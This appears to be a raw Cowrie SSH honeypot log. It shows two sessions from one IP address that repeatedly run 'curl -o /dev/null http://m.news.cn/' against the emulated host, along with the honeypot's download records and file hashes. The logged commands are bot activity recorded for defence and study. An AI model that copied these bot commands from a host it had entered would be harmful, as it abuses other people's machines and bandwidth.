{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:26.544482Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.545470Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:26.564856Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.566058Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.568986Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.571574Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.656079Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.684668Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.702600Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:26.723461Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.724705Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:26.731738Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.732789Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.736498Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.743917Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.762444Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.763969Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.767756Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:26.778457Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.779560Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:26.782635Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.783711Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.804507Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.806073Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:26.814733Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.815820Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:26.820765Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.822074Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.845938Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:26.850052Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.851100Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:26.861056Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.862571Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:26.885599Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.886871Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.889419Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:26.916618Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.917788Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.920678Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:26.923566Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.924554Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.941622Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:26.958606Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.959686Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:26.961484Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.962579Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.964661Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.984061Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:26.997976Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:26.999235Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:27.002990Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.004061Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.019053Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.027551Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:27.040695Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.041826Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:27.047679Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.048736Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.049876Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.065149Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.066231Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.090367Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.092810Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.128654Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.130185Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:27.155367Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.156708Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.165960Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:27.166906Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.168339Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.171007Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.173277Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.182904Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:27.206626Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.207991Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:27.216650Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.217939Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:27.242190Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.243943Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:27.255403Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.256590Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.276530Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:27.284445Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.285631Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.289706Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:27.300879Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.302055Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.328201Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.330209Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:27.393791Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.395077Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.396772Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.398397Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:27.406759Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.407791Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:27.457210Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.458536Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:27.474737Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.476066Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.482736Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.484116Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:27.527525Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.528886Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.549581Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.551637Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:27.554032Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.555709Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.589646Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:27.591254Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
